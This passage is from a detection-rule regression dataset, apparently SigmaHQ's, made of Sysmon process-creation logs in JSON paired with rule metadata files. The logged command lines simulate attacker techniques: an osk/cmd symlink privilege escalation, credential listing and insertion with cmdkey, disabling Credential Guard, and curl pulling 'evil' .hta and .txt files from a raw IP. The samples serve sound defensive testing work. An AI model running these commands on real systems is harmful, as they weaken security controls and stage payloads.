"EventRecordID": 27923, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3116, "ThreadID": 1656 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-04 07:01:44.963", "ProcessGuid": "0197231E-31D8-6931-7209-000000000900", "ProcessId": 13752, "Image": "C:\\Windows\\System32\\cmd.exe", "FileVersion": "10.0.26100.2454 (WinBuild.160101.0800)", "Description": "Windows Command Processor", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "Cmd.Exe", "CommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"start /b /min C:\\Users\\xodih\\Music\\random.vbs\"", "CurrentDirectory": "C:\\WINDOWS\\system32\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-BBFB-692F-3C8C-050000000000", "LogonId": "0x58c3c", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=352B525E9C26CB92693899528FE007C2,SHA256=1F1D918EC49E0B7C59B704FF412E1A6E224DA81C08CDA657E1CB482ABAAC146C,IMPHASH=94F3EFC2DF40ECD7229B904540DD83CF", "ParentProcessGuid": "0197231E-BBFF-692F-8200-000000000900", "ParentProcessId": 5200, "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "C:\\WINDOWS\\Explorer.EXE", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/info.yml ================================================ id: d813db34-f7f0-4713-a419-b491701aa1d1 description: N/A date: 2025-12-04 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d title: Cmd Launched with Hidden Start Flags to Suspicious Targets regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: 
regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:15:18.885132Z" } }, "EventRecordID": 8471746, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:15:18.879", "ProcessGuid": "5AA13A44-CD66-68FC-F12F-000000004002", "ProcessId": 8620, "Image": "C:\\Windows\\System32\\cmd.exe", "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", "Description": "Windows Command Processor", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "Cmd.Exe", "CommandLine": "cmd /c \"mklink C:\\Windows\\System32\\osk.exe C:\\Windows\\System32\\cmd.exe\"", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", 
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml ================================================ id: 20e20ac5-43f2-40a3-811c-53466d1be222 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: e9b61244-893f-427c-b287-3e708f321c6b title: Potential Privilege Escalation Using Symlink Between Osk and Cmd regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:16:49.968129Z" } }, "EventRecordID": 8498306, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:16:49.961", "ProcessGuid": "5AA13A44-CDC1-68FC-F82F-000000004002", "ProcessId": 608, "Image": 
"C:\\Windows\\System32\\cmd.exe", "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", "Description": "Windows Command Processor", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "Cmd.Exe", "CommandLine": "cmd /c \"rmdir /s /q malware_folder\"", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml ================================================ id: 20a05730-38e8-4889-ab29-0723f185deb0 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 41ca393d-538c-408a-ac27-cf1e038be80c title: Directory Removal Via Rmdir regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": 
{ "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:20:36.737647Z" } }, "EventRecordID": 8565164, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:20:36.729", "ProcessGuid": "5AA13A44-CEA4-68FC-1330-000000004002", "ProcessId": 4944, "Image": "C:\\Windows\\System32\\cmdkey.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Credential Manager Command Line Utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "cmdkey.exe", "CommandLine": "\"C:\\Windows\\system32\\cmdkey.exe\" /generic:TERMSRV/AR-WIN-DC /user:ATTACKRANGE\\Administrator /pass:1password2!", "CurrentDirectory": "C:\\tools\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A", "ParentProcessGuid": "5AA13A44-0BE6-68FC-A61D-000000004002", "ParentProcessId": 10004, "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentCommandLine": "powershell -noprofile", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml ================================================ id: 
56a1d988-b883-41dc-ba91-6077c43189df description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 title: New Generic Credentials Added Via Cmdkey.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:21:33.116889Z" } }, "EventRecordID": 8581967, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:21:33.111", "ProcessGuid": "5AA13A44-CEDD-68FC-1B30-000000004002", "ProcessId": 7876, "Image": "C:\\Windows\\System32\\cmdkey.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Credential Manager Command Line Utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "cmdkey.exe", "CommandLine": "cmdkey /list", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", 
"TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml ================================================ id: aa97fab6-a83e-4e4f-ad0b-f0cc2a43c24e description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 07f8bdc2-c9b3-472a-9817-5a670b872f53 title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:38:32.006926Z" } }, "EventRecordID": 12090706, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": 
"ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:38:32.006", "ProcessGuid": "5AA13A44-0B18-68FD-6336-000000004002", "ProcessId": 7232, "Image": "C:\\Windows\\System32\\conhost.exe", "FileVersion": "10.0.20348.4294 (WinBuild.160101.0800)", "Description": "Console Window Host", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CONHOST.EXE", "CommandLine": "conhost --headless powershell calc", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=061B747FBA99B050D8874167AAD6D1D790F8A3A8,MD5=7E13A7EA7BD3601760E3838D99E31710,SHA256=D7714ECAE976F14B3AFA409FF5A3616E8D6D0CCE8269E611D7835A7C12235D6B,IMPHASH=AFF4D1EA89D0D66F7D04180143E61D12", "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", "ParentProcessId": 3204, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml ================================================ id: 6e70bb8b-561e-4af4-bad6-f582c656d047 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 056c7317-9a09-4bd4-9067-d051312752ea title: Powershell Executed From Headless ConHost Process regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx ================================================ FILE: 
regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/c17d47b7-dcd6-4109-87eb-d1817bd4cbc9.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-26T06:45:49.034405Z" } }, "EventRecordID": 23573, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3484, "ThreadID": 3424 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-26 06:45:49.010", "ProcessGuid": "0197231E-2F1D-694E-F304-000000000A00", "ProcessId": 12232, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "FileVersion": "10.0.26100.1 (WinBuild.160101.0800)", "Description": "Windows PowerShell", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "PowerShell.EXE", "CommandLine": "\"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"Set-ItemProperty -Path \"HKLM:Software\\Policies\\Microsoft\\Windows\\DeviceGuard\" -Name \"EnableVirtualizationBasedSecurity\" -Value 0\"", "CurrentDirectory": "C:\\Windows\\System32\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-DDAE-694E-10B6-120000000000", "LogonId": "0x12b610", "TerminalSessionId": 1, "IntegrityLevel": "High", "Hashes": "MD5=1736263E02468939F808C0528E8DBB7E,SHA256=1F9FFC2227F8DEA8B771D543C464CF8166C22A39420A5322B5892A640C4B34B6,IMPHASH=68A9FF9C8D0D4655E46E1A7A190A41D2", "ParentProcessGuid": "00000000-0000-0000-0000-000000000000", "ParentProcessId": 10996, "ParentImage": "-", 
"ParentCommandLine": "-", "ParentUser": "-" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/info.yml ================================================ id: f96a3ce2-ae73-4171-8877-71ccf1da7ce5 description: N/A date: 2025-12-26 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: c17d47b7-dcd6-4109-87eb-d1817bd4cbc9 title: Windows Credential Guard Registry Tampering Via CommandLine regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/c17d47b7-dcd6-4109-87eb-d1817bd4cbc9.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-11T06:22:12.568940Z" } }, "EventRecordID": 21497, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-11 06:22:12.498", "ProcessGuid": "0197231E-6314-693A-D112-000000000800", "ProcessId": 11000, "Image": "C:\\Windows\\System32\\curl.exe", "FileVersion": "8.10.1", "Description": "The curl executable", "Product": "The curl executable", "Company": "curl, 
https://curl.se/", "OriginalFileName": "curl.exe", "CommandLine": "curl.exe --cookie-jar cookie \"http://example.com\"", "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000", "LogonId": "0x3144c", "TerminalSessionId": 1, "IntegrityLevel": "High", "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", "ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800", "ParentProcessId": 3476, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml ================================================ id: d7f159c3-db76-4e39-b677-c0958f5f82b8 description: N/A date: 2025-12-11 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 5a6e1e16-07de-48d8-8aae-faa766c05e88 title: Potential Cookies Session Hijacking regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { 
"#attributes": { "SystemTime": "2025-12-11T06:17:19.772545Z" } }, "EventRecordID": 21475, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-11 06:17:19.636", "ProcessGuid": "0197231E-61EF-693A-C812-000000000800", "ProcessId": 6400, "Image": "C:\\Windows\\System32\\curl.exe", "FileVersion": "8.10.1", "Description": "The curl executable", "Product": "The curl executable", "Company": "curl, https://curl.se/", "OriginalFileName": "curl.exe", "CommandLine": "curl.exe -H \"User-Agent: EvilAgent\" http://example.com", "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000", "LogonId": "0x3144c", "TerminalSessionId": 1, "IntegrityLevel": "High", "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", "ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800", "ParentProcessId": 3476, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml ================================================ id: 6428e458-fe2e-4936-accb-aebd0bcc8e35 description: N/A date: 2025-12-11 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 85de1f22-d189-44e4-8239-dc276b45379b title: Curl Web Request With Potential Custom User-Agent regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: 
regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-11T07:02:39.732592Z" } }, "EventRecordID": 21767, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-11 07:02:39.718", "ProcessGuid": "0197231E-6C8F-693A-2613-000000000800", "ProcessId": 17752, "Image": "C:\\Windows\\System32\\curl.exe", "FileVersion": "8.10.1", "Description": "The curl executable", "Product": "The curl executable", "Company": "curl, https://curl.se/", "OriginalFileName": "curl.exe", "CommandLine": "curl --output hello.txt https://12.34.56.78/hack/evil.txt", "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", "ParentProcessId": 14736, "ParentImage": "C:\\Windows\\System32\\cmd.exe", 
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml ================================================ id: 6aac357c-fe1d-4ca0-82e2-df626f71e838 description: N/A date: 2025-12-11 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218 title: File Download From IP URL Via Curl.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-11T06:34:20.042883Z" } }, "EventRecordID": 21588, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-11 06:34:19.983", "ProcessGuid": "0197231E-65EB-693A-F112-000000000800", "ProcessId": 14440, "Image": "C:\\Windows\\System32\\curl.exe", "FileVersion": "8.10.1", "Description": "The curl executable", "Product": "The curl 
executable", "Company": "curl, https://curl.se/", "OriginalFileName": "curl.exe", "CommandLine": "curl --output benign.hta \"https://12.34.56.78/hack/evil.hta\"", "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", "ParentProcessId": 14736, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml ================================================ id: 0f1b33fc-f97e-4469-a9ec-32ffb436f490 description: N/A date: 2025-12-11 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 title: Suspicious File Download From IP Via Curl.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, 
